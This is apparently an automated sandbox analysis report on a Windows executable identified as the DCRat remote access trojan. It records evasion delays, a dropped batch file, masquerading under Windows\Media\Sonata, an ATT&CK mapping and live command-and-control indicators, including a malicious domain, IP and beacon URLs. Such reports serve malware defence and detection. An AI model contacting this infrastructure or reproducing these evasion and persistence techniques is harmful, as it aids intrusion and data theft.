Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Memory allocated: 16E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Memory allocated: 1B270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Memory allocated: 1360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Memory allocated: 1AEE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Memory allocated: 820000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Memory allocated: 1A4D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Memory allocated: 12D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Memory allocated: 1AFB0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Thread delayed: delay time: 599782	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Window / User API: threadDelayed 1304	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Window / User API: threadDelayed 945	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Window / User API: threadDelayed 369	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Window / User API: threadDelayed 359	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Window / User API: threadDelayed 1014	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Window / User API: threadDelayed 899	Jump to behavior

Source: C:\Users\user\Desktop\QT4aLb3P98.exe TID: 6576	Thread sleep count: 1304 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe TID: 6464	Thread sleep count: 945 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe TID: 5076	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7180	Thread sleep count: 369 > 30	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 5600	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7196	Thread sleep count: 359 > 30	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7196	Thread sleep count: 1014 > 30	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7244	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7244	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7244	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7244	Thread sleep time: -599782s >= -30000s	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 3804	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7296	Thread sleep count: 899 > 30	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7300	Thread sleep count: 131 > 30	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7272	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\QT4aLb3P98.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Thread delayed: delay time: 599782	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\QT4aLb3P98.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: w32tm.exe, 00000009.00000002.1738132193.00000180BDA07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wRRcPdViqk.exe, 0000000B.00000002.1720190148.000000001B501000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\QT4aLb3P98.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\QT4aLb3P98.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\eE9QbXcUOX.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Media\Sonata\wRRcPdViqk.exe "C:\Windows\Media\Sonata\wRRcPdViqk.exe"	Jump to behavior

Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Queries volume information: C:\Users\user\Desktop\QT4aLb3P98.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Queries volume information: C:\Windows\Media\Sonata\wRRcPdViqk.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Queries volume information: C:\Windows\Media\Sonata\wRRcPdViqk.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Queries volume information: C:\Windows\Media\Sonata\wRRcPdViqk.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\QT4aLb3P98.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1687936780.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1818454348.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1716375349.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1687936780.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1774437286.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1688308009.000000001327F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QT4aLb3P98.exe PID: 6872, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wRRcPdViqk.exe PID: 5696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wRRcPdViqk.exe PID: 5104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wRRcPdViqk.exe PID: 7252, type: MEMORYSTR

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1687936780.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1818454348.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1716375349.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1687936780.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1774437286.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1688308009.000000001327F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QT4aLb3P98.exe PID: 6872, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wRRcPdViqk.exe PID: 5696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wRRcPdViqk.exe PID: 5104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wRRcPdViqk.exe PID: 7252, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scheduled Task/Job	11 Process Injection	123 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scripting	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
QT4aLb3P98.exe	84%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
QT4aLb3P98.exe	69%	Virustotal		Browse
QT4aLb3P98.exe	100%	Avira	HEUR/AGEN.1323984
QT4aLb3P98.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\eE9QbXcUOX.bat	100%	Avira	BAT/Delbat.C
C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe	84%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe	69%	Virustotal		Browse
C:\Windows\Media\Sonata\wRRcPdViqk.exe	84%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Windows\Media\Sonata\wRRcPdViqk.exe	69%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
a1009608.xsph.ru	13%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://index.from.sh/pages/game.html	0%	Avira URL Cloud	safe
http://a1009608.xsph.ru/	100%	Avira URL Cloud	malware
http://a1009608.xsph.ru/1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470d5=3fcabe54654b82392e895aa4c4e7b395&a9d3e3cdc71e35b96ad20cf4efbd4740=gY3MmNzQjNkhTNzE2M1YWZwAjZ1QTZ0ITO1Y2NmVmY4YDNwEzYjZmM&rgHy1i1qGuabZNE=KZftVioRcmp7cZPF	100%	Avira URL Cloud	malware
http://a1009608.xsph.ru	100%	Avira URL Cloud	malware
https://cp.sprinthost.ru	0%	Virustotal		Browse
https://cp.sprinthost.ru	0%	Avira URL Cloud	safe
https://index.from.sh/pages/game.html	0%	Virustotal		Browse
http://a1009608.xsph.ru	13%	Virustotal		Browse
https://cp.sprinthost.ru/auth/login	0%	Avira URL Cloud	safe
http://a1009608.xsph.ru/@=MjZ2QmMzETM	100%	Avira URL Cloud	malware
http://a1009608.xsph.ru/1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470	100%	Avira URL Cloud	malware
http://a1009608.xsph.ru/	13%	Virustotal		Browse
https://cp.sprinthost.ru/auth/login	0%	Virustotal		Browse
http://a1009608.xsph.ru/@=MjZ2QmMzETM	4%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
a1009608.xsph.ru	141.8.192.103	true	true	13%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://a1009608.xsph.ru/1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470d5=3fcabe54654b82392e895aa4c4e7b395&a9d3e3cdc71e35b96ad20cf4efbd4740=gY3MmNzQjNkhTNzE2M1YWZwAjZ1QTZ0ITO1Y2NmVmY4YDNwEzYjZmM&rgHy1i1qGuabZNE=KZftVioRcmp7cZPF	true	Avira URL Cloud: malware	unknown
http://a1009608.xsph.ru/@=MjZ2QmMzETM	true	4%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://a1009608.xsph.ru/	wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002625000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002639000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://cp.sprinthost.ru	wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002660000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://index.from.sh/pages/game.html	wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002660000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	QT4aLb3P98.exe, 00000000.00000002.1687936780.000000000344F000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002639000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://a1009608.xsph.ru	wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002639000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002660000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://cp.sprinthost.ru/auth/login	wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002660000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://a1009608.xsph.ru/1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470	wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002639000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
141.8.192.103	a1009608.xsph.ru	Russian Federation		35278	SPRINTHOSTRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483427
Start date and time:	2024-07-27 13:06:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	QT4aLb3P98.exe renamed because original name is a hash value
Original Sample Name:	1a9c19cd373f9ce0642f18f6965521b3.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@16/11@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 77% Number of executed functions: 373 Number of non-executed functions: 4
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target QT4aLb3P98.exe, PID 6872 because it is empty
Execution Graph export aborted for target wRRcPdViqk.exe, PID 5104 because it is empty
Execution Graph export aborted for target wRRcPdViqk.exe, PID 5696 because it is empty
Execution Graph export aborted for target wRRcPdViqk.exe, PID 7252 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
